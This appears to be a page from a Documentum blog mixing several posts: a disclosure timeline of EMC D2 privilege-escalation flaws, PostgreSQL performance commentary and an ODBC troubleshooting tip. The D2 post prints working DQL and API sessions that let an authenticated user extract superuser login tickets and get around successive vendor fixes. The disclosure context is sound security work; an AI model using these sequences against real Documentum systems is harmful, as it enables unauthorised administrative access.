D2 (and Webtop and xCP) CTF

Alvaro de Andres' Blog

CTF (Content Transfer Framework) is how EMC Dell calls their “new UCF”. It works as a browser extension, and is the same extension you’ve used for the latest version of Webtop (new functionality getting first to Webtop? LOL). And this mode is not the default (why?) so you’ll need to change it in the settings.properties file of D2.

Also, this extension will generate some “index” files on the folder where you download files:

  • .checkout.xml
  • .d2_edit_storage.json
  • .d2_view_storage.json
  • .view.xml

That contain object names, ids, operation performed, and folder paths of the files transferred.

Tested on latest Firefox Nightly x64 and Chrome.

FYI, I’m pasting the “wonderful” ASCII compatibility matrix provided by Dell in the configuration file:

#     +——————-+——+——+——+——+
#     | Browser:OS Mode | Thin | Java | ctf  | Note |
#     +——————-+——+——+——+——+
#     | IE 11             | yes  | yes  | yes  |      |
#     +——————-+——+——+——+——+
#     | Edge              | yes …

View original post 155 more words

Say goodbuy LockBox. Part II

Wow, interesting news came from where I didn’t expect: ECN guys states that EMC have stopped torturing customers and gave up the idea of using RSA Lockbox.

Here’s a little history of the Lockbox story that you might want to read:

November 2013

Reported to EMC using support portal, proof of concept how authenticated user was able to gain superuser privileges:

1> create c6_method_return object set message='test' 
2> go 
object_created 
-------------- 
00002ee280000e9b 
(1 row affected) 
1> execute do_method with method='D2GetAdminTicketMethod', 
2> arguments='-docbase_name d2 -password "" -method_return_id 00002ee280000e9b' 
3> go 
... 
(1 row affected) 
1> select message from c6_method_return where r_object_id='00002ee280000e9b' 
2> go 
message 
-------------- 
DM_TICKET=T0..... 
(1 row affected)

January 2014

EMC released Document D2 v 4.2 and some patches for previous versions, no CVE announced. The EMC “solution” was to encrypt data passed through c6_method_return objects

February 2014

Discovered a reflection attack on D2GetAdminTicketMethod method:

1> create c6_method_return object set message='test' 
2> go 
object_created 
---------------- 
00002f0a8000291d 
(1 row affected) 
1> execute do_method with method='D2GetAdminTicketMethod', 
2> arguments='-docbase_name d242 -password "" -method_return_id 00002f0a8000291d 
3> -scope global -timeout 3600' 
4> go 
... 
(1 row affected) 
1> select message from c6_method_return where r_object_id='00002f0a8000291d' 
2> go 
--- 
--- now message contains encrypted data 
--- 
message 
---------------------------------------------------------------------------- 
AAAAEMm1Ypog8dNWsELGoge38HRKVIUnN4/vw4rmz8xJ7EcZuOaQ8rT6vAktbc8g5qV07pme7nt2 
hG4D+ljeR2G5JCystXA8JDDaxmM5xjNfwshe9YldFZBlSinYBvFdigpuZCmTFES+n1b5ZbVC/L7b 
aZ7UI1LI06YhJvRcVjB9mzwMENk8H7KaxDXiFBCEQSiNNn5DoXwjZPWLJd9WTdXIlXpPzWAR2KG+ 
... 
(1 row affected)
1> update c6_method_return object 
2> set parameter_name[0]='-timeout', 
3> set parameter_value[0]=(select message from c6_method_return 
4> where r_object_id='00002f0a8000291d') 
5> where r_object_id='00002f0a8000291d' 
6> go 
objects_updated 
--------------- 
1 
(1 row affected) 
[DM_QUERY_I_NUM_UPDATE]info: "1 objects were affected by your UPDATE statement." 

1> execute do_method with method='D2GetAdminTicketMethod', 
2> arguments='-docbase_name d242 -password "" -method_return_id 00002f0a8000291d 
3> -scope global' 
4> go 
... 
(1 row affected) 

1> select error from c6_method_return where r_object_id='00002f0a8000291d' 
2> go 
--- 
--- Here NumberFormatException occurs and unencrypted ticked is written 
--- to error field of c6_method_return object 
--- 
error 
---------------------------------------------------------------------------- 
For input string: "DM_TICKET=T0JKIE5VTEwgMAoxMwp2ZXJzaW9uIElOVCBTIDAKMwpmbGFncyBJTlQ 
(1 row affected)

March 2014

EMC released P01 patch for EMC Documentum D2 v4.2, no CVE announced. The vendor “solution” was not to store exception messages into “error” attribute of c6_method_return object if exception message contains “DM_TICKET” character sequence.

April 2014

Discovered another reflection attack based on verbose logging of D2GetAdminTicketMethod:

API> create,c,c6_method_return 
... 
000224838000011f 
API> save,c,l 
... 
OK 
API> apply,c,,DO_METHOD,METHOD,S,D2GetAdminTicketMethod, 
ARGUMENTS,S,' 
-docbase_name d2 
-password "" 
-method_return_id 000224838000011f 
-scope global 
-timeout 3600 
' 
... 
q0 
API> next,c,q0 
... 
OK 
API> dump,c,q0 
... 
USER ATTRIBUTES 

result : 0 
process_id : 0 
launch_failed : F 
method_return_val : 0 
os_system_error : No Error 
timed_out : F 
time_out_length : 100 
app_server_host_name : test 
app_server_port : 9080 
app_server_uri : /DmMethods/servlet/DoMethod 
error_message : 

SYSTEM ATTRIBUTES 


APPLICATION ATTRIBUTES 


INTERNAL ATTRIBUTES 


API> close,c,q0 
... 
OK 
API> revert,c,000224838000011f 
... 
OK 
API> get,c,000224838000011f,message 
... 
AAAAEFRN36mfm+NAm49DQAZol1fSBbIgoELusFMnk4eE6r3qNPm/83NDxqiFyoe7Yt/GOjASn6v2 
v2XjSaJq5MqGK8PgrNPbNz5KSAzxcKTWorJym/7ceZsp9l5pSUcDr1mj8xKg0M/iH8AIS8ZGZ9/L 
2bd1FOth86ISN2OnAIOAlzh32I0/YcLYt7nSSfFWDL9H9qzzkp6Za/NeZt4Z0kE1gYNPaVrlPD4D 
qC4bcSb3p54VeAZCVOgpUp3sJ+8kevoRQSKckOTSinBYF4qQa9pnNYQx8wczFk2/pM0pkCdDigyT 
... 

API> ?,c,update c6_method_return object 
set parameter_name[0]='-timeout', 
set parameter_value[0]=(select message from c6_method_return 
where r_object_id='000224838000011f') 
where r_object_id='000224838000011f' 
objects_updated 
--------------- 
1 
(1 row affected) 
[DM_QUERY_I_NUM_UPDATE]info: "1 objects were affected by your UPDATE statement." 

--- 
--- Here we put extra parameter "SAVE_RESULTS,B,T" to save execution results 
--- of D2GetAdminTicketMethod docbase method 
--- 
API> apply,c,,DO_METHOD,METHOD,S,D2GetAdminTicketMethod, 
ARGUMENTS,S,' 
-docbase_name d2 
-password "" 
-method_return_id 000224838000011f 
-scope global -timeout 3600 
', 
SAVE_RESULTS,B,T 
... 
q0 
API> next,c,q0 
... 
OK 
API> dump,c,q0 
... 
USER ATTRIBUTES 

result : 0902248380002a67 
result_doc_id : 0902248380002a67 
process_id : 0 
launch_failed : F 
method_return_val : 0 
os_system_error : No Error 
timed_out : F 
time_out_length : 100 
app_server_host_name : test 
app_server_port : 9080 
app_server_uri : /DmMethods/servlet/DoMethod 
error_message : 

SYSTEM ATTRIBUTES 


APPLICATION ATTRIBUTES 


INTERNAL ATTRIBUTES 


API> close,c,q0 
... 
OK 
--- 
--- Now message contains encrypted data and error is empty 
--- 
API> get,c,000224838000011f,message 
... 
AAAAEBBMjU2FE27RAOiKSkZdJZM7tl1ht+LhqjvPsmr9DPg3nVgGFyROrETPX6Wy8uuEWbtKSWs3 
MNr8qe3EBNTejbieKZ2YzzUY/46fLdbOQFInczwrNCBoWF9zBnTlhoHK1f+ctpm9nUsK2wJbDZXb 
mk6+1VO5RsUEuFV/qux5LBdXpIr7dRornpDJiBP5hoPILObq4++KvBfhZjaPxEnoOMksfwgmU8XC 
... 
--- 
--- But execution results do contain unencrypted ticket 
--- 
API> get,c,000224838000011f,error 
... 

API> getpath,c,0902248380002a67 
... 
/u01/documentum/cs/data/d2/content_storage_01/00022483/80/00/09/e1.txt 
API> quit 
Bye 
~]$ cat content_storage_01/00022483/80/00/09/e1.txt 
==== START ======================================================= 
D2-API v4.2.0010 build 378 
DFC version : 7.1.0020.0120 
file.encoding : UTF-8 
Arguments : {-docbase_name=d2, 
-method_return_id=000224838000011f, 
-password=, 
-class_name=com.emc.d2.api.methods.D2GetAdminTicketMethod, 
-scope=global, 
-timeout=DM_TICKET=T0JKIE5VTEwgMAoxMwp.... 
} 
-Scope : global 
-TimeOut : 3600 
-SingleUse : true 
==== END (0.095s) ================================================

August 2014

EMC announced CVE-2014-2515, the solution was intended to mitigate previously described reflection attacks

August 2014

Discovered another set of vulnerabilities in implementation of “protection” of D2GetAdminTicketMethod method. The basic idea was: attacker was able to delete any file from CS filesystem, and in case of deletion of Lockbox file D2 started to use default passphrase (i.e. com.emc.d2.api.utils.GetCryptedPassword)

August 2014

EMC announced CVE-2015-4537

February 2015

I got tired and proved that RSA Lockbox is not a security solution: RSA LOCKBOX MAGIC 🙂.

Check and mate.

PostgreSQL performance

Yesterday I was playing with Documentum/PostgreSQL installed into Docker container trying to either prove or refute the following statement from release notes:

Actually, it is not clear how EMC got such “promising” results, because all my knowledge about PostgreSQL tells me that the statement about “15% performance gap” sounds too optimistic. Let’s explain.

First of all, I do not want to put any blame on PostgreSQL – it is just a database which plays in second league (for the record: Oracle plays in premier league, MSSQL plays in first league), and I’m not going to explain thoroughly why I think so, but the basic idea is PostgreSQL completely lacks diagnostics and backup and recovery tools, and tools which exist are a piece of dog crap – example below demonstrates how “explain analyze” lies about execution time:

--
-- I create 5Gb table in database and PostgreSQL reports that 
-- it is able to read all data from this table in 1 ms.
-- Fuck yeah, PostgreSQL turned my MBP into a supercomputer
--
postgres=# create table t1 as select lpad('x',100,'x') as a1, 
postgres-#                  (SELECT array_to_string(ARRAY(SELECT chr((65 + round(random() * 25)) :: integer) 
postgres(#                    FROM generate_series(1,1024*1024)), '')
postgres(#                  ) as a2 from generate_series(1,5*1024);
SELECT 5120
postgres=# explain analyze select a2 from t1;
                                             QUERY PLAN                                              
-----------------------------------------------------------------------------------------------------
 Seq Scan on t1  (cost=0.00..145.20 rows=5120 width=18) (actual time=0.023..0.758 rows=5120 loops=1)
 Planning time: 3.140 ms
 Execution time: 0.963 ms
(3 rows)

postgres=# explain analyze select a2 from t1;
                                             QUERY PLAN                                              
-----------------------------------------------------------------------------------------------------
 Seq Scan on t1  (cost=0.00..145.20 rows=5120 width=18) (actual time=0.010..1.056 rows=5120 loops=1)
 Planning time: 0.033 ms
 Execution time: 1.380 ms
(3 rows)

postgres=# 

Now, why I doubt that “15% performance gap” is realistic.

The main problem is MVCC implementation in PostgreSQL – every time when you update row PostgreSQL creates new version of data and stores it in another place – note that ctid gets changed upon every update:

postgres=# create table t1(a1 int);
CREATE TABLE
postgres=# insert into t1 values(1);
INSERT 0 1
postgres=# begin;
BEGIN
postgres=# select ctid, a1 from t1;
 ctid  | a1 
-------+----
 (0,1) |  1
(1 row)

postgres=# update t1 set a1=2;
UPDATE 1
postgres=# select ctid, a1 from t1;
 ctid  | a1 
-------+----
 (0,2) |  2
(1 row)

postgres=# update t1 set a1=3;
UPDATE 1
postgres=# select ctid, a1 from t1;
 ctid  | a1 
-------+----
 (0,3) |  3
(1 row)

and such behaviour leads to the following conclusions:

  • wide tables do not like updates – it is required to copy a lot of data
  • every update affects all table indexes

My experience (comparison with Oracle, single user) is following:

  • inserts (creation of objects) are 15% slower
  • updates are 50% slower

Weird Can’t open lib ‘/usr/pgsql-9.5/lib/psqlodbcw.so’ : file not found error

I have read a couple of posts on ECN and have found that people experience difficulties when installing Documentum/PostgreSQL build – they get something like:

[dmadmin@docu73dev01 bin]$ dmdbtest -Ddctm_psql -SDCTM_PSQL -Udctm_psql -PLWlW2k0CbEne
Failed to make a database connection using the following data:
   Database Server: DCTM_PSQL
   Database Name  : dctm_psql
   User Name      : dctm_psql
   User Password  : Check either the -P flag on command line or 
                    the password file specified in your server.ini
  Error from database system is:  STATE=01000, CODE=0, MSG=[unixODBC][Driver Manager]Can't open lib '/usr/pgsql-9.5/lib/psqlodbcw.so' : file not found
ERROR(-1)   (system code: -1)
[dmadmin@docu73dev01 bin]$ ls -la /usr/pgsql-9.5/lib/psqlodbcw.so
-rwxr-xr-x 1 root root 436904 Aug 27 14:02 /usr/pgsql-9.5/lib/psqlodbcw.so
[dmadmin@docu73dev01 bin]$ file dmdbtest 
dmdbtest: setuid setgid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, BuildID[sha1]=6a65a8e84e78f9745a5c4ad6e5e695ec30e58b56, not stripped
[dmadmin@docu73dev01 bin]$ file /usr/pgsql-9.5/lib/psqlodbcw.so
/usr/pgsql-9.5/lib/psqlodbcw.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=bde7b12fe740dc03718b62030ba27ad0a1007dce, stripped
[dmadmin@docu73dev01 bin]$ 

i.e. all files exist, architecture is the same, but installation fails, and the best recipe for now is to download docker image from support portal and extract ODBC drivers from that image – good job EMC. More strange thing is I do not experience such difficultiesfollow my hands:

[dmadmin@docu73dev01 bin]$ mv liblber-2.4.so.2 liblber-2.4.so.2.bak
[dmadmin@docu73dev01 bin]$ dmdbtest -Ddctm_psql -SDCTM_PSQL -Udctm_psql -PLWlW2k0CbEne
Database successfully opened.
Test table successfully created.
Test view successfully created.
Test index successfully created.
Insert into table successfully done.
Index successfully dropped.
View successfully dropped.
Database case sensitivity test successfully past. 
Table successfully dropped.
[dmadmin@docu73dev01 bin]$